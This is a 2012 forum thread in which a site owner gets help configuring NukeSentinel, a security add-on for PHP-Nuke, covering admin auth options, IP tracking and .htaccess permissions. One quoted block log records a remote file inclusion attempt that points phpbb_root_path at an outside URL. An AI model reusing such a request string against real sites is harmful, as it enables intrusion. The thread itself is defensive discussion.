what to do with ABAuthList

Worker Joined: Apr 17, 2011 Posts: 117 Location: Amsterdam

can someone explaine to me what to do with this option.. I mean what does it do and if I need to it change the setting inside it...

I am looking for a manual for Nukesentinel configuration..

this page

http://www.ravenphpscripts.com/nukesentinelmanual-menu_faq.html

does't load the menu good with crome and IE.. I can't click on the right url...

Posted: Sun Oct 28, 2012 9:26 am

When you go to NukeSentinel administration, what version does it show? Should be 2.6.03 I believe.

Next check the overall Nukesentinel admin settings. Do you have the "admin auth" turned on? This provides an additional check when someone tries to access your admin screens. It may not be needed. See if turning it off fixes your problem.

Also, please let us know exactly where the problem is occurring. Is it when you go to scan for new admins? Or where? Does it work properly with Firefox but not Chrome and IE? When you say that you can't click on the "right url" which one are you referring to?

Posted: Sun Oct 28, 2012 10:28 am

I mean the menu in the header in the next page

http://www.ravenphpscripts.com/nukesentinelmanual-menu_faq.html

Only registered users can see links on this board! Get registered or login!
Only registered users can see links on this board! Get registered or login!

I wanna configure sentinel and test it... that's why I was looking for the faq page

Posted: Sun Oct 28, 2012 1:38 pm

Sorry, I didn't understand your question at first. Now I do, but I don't have any good news. I ran that page through the W3C validator and there are many, many errors (over 200). I am sure the FAQ has not been maintained in years and I doubt that it is even current with the latest NS changes. The author of NS has moved on and keeping the FAQ up to date is a task that I doubt anyone will take on.

If you have specific questions about NukeSentinel you can post them here and we'll try to help as best we can.

Posted: Sun Oct 28, 2012 2:20 pm

after installation the sentinel without any troubles.. I have changed some options to turn it on. I want know if it does protect the nuke site ... is there any test method?

I just don't want use the admin protection via .htaccess... do I really need it?

Site Admin Joined: Aug 22, 2007 Posts: 1775

Here the link to the AuthList FAQ:
http://www.ravenphpscripts.com/nukesentinelmanual-httpauth.html

Posted: Sun Oct 28, 2012 3:49 pm

You don't need admin protection ... it's just an option. Most of the protections in NS are just that: options. For a test method you'd need to duplicate a hack and see. We won't be posting hacks here.

Assuming that you have Nuke Sentinel running on a live site, you will see what it is doing pretty quickly. Basically, hackers are constantly probing ALL live sites and you will quickly start to see blocked IP's get posted (and you will get emails at your admin ID reflecting that). You can also look at blocked IP's with IP tracking. And you can look at all activity on your site using IP tracking too. One of the good ways to get familiar with what's going on is to go through the IP tracking screens periodically and just look at what users are doing and how. You'll see a constant stream of them trying, for instance, to post to your forums even if they don't have usernames. I assume that you don't let anonymous post and require admin approval of new usernames.

Posted: Mon Oct 29, 2012 3:59 am

Quote:

Created By: NukeSentinel(tm) 2.6.02
Date & Time: 2012-10-29 02:52:55 CET GMT +0100 Blocked IP: 94.142.130.149 User ID: Anonymous (1)
Reason: Abuse-Script
--------------------
Referer: on site
User Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 WebMoney Advisor
HTTP Host: mysite.nl/....

I recived in my box..

I only dont know what to do now... I don't see any blocked ip yet.

Posted: Mon Oct 29, 2012 8:06 am

Go to the blocked IP choice on your NukeSentinel screen and display blocked IP's. If you have Cpanel or similar access you can also look at the .htaccess file in your nukeroot directory and see if the blocked IP address has been added.

You might also want to look in the IP tracking setting in your general Sentinel admin screen and assure that it's turned on. If so, you can go to the IP tracking menu and look at what's going on by displaying tracked IP's or tracked users. Sometimes tracked users is the better choice because you can easily see what anonymous is doing. Usually that's where the hacks come from.

Posted: Mon Oct 29, 2012 9:21 am

@fkelly.. Yep I know this info. great options and possibiliets . but there is no ip added to the db or even to the .httacces

.htaccess has 666 rights

I wanna thank you all for the information.. I think it is okey like now. thumbs up

Posted: Mon Oct 29, 2012 9:26 am

You are welcome. Check your path to htaccess in your NS administration screen. If that's not right you won't be able to write there. I'm not sure, but an error in writing there could cause the database write to not happen also. Your logs should show any errors.

Privileges on htaccess should not be the issue. Mine are 644 and it works fine. But the path has to be correct.

Posted: Tue Nov 13, 2012 6:48 am

fkelly wrote:

You are welcome. Check your path to htaccess in your NS administration screen. If that's not right you won't be able to write there. I'm not sure, but an error in writing there could cause the database write to not happen also. Your logs should show any errors.

Privileges on htaccess should not be the issue. Mine are 644 and it works fine. But the path has to be correct.

I recive almost every dag a mail... I do worry about somthing and I want share it with you for advice

Code:




Created By: NukeSentinel(tm) 2.6.02


Date &amp; Time: 2012-11-13 12:31:24 CET GMT +0100 Blocked IP: 202.152.221.9 User ID: Anonymous (1)


Reason: Abuse-Filter


--------------------


Referer: none


User Agent: Mozilla/4.61 [en] (OS/2; U)


HTTP Host: mysite.nl


Script Name: /modules/Forums/admin/admin_db_utilities.php


Query String: phpbb_root_path=http://mediapluss.info/wp-includes/images/crystal/t??


Get String: phpbb_root_path=http://mediapluss.info/wp-includes/images/crystal/t?


?


Post String: Not Available


Forwarded For: none


Client IP: none


Remote Address: 202.152.221.9


Remote Port: 3605


Request Method: GET

is this a hacker ? it has been blocked I can see

registered · Posted: Sat Nov 17, 2012 9:45 am

Yes, this is a hack attempt. Pretty sure a very old exploit that has long since been patched.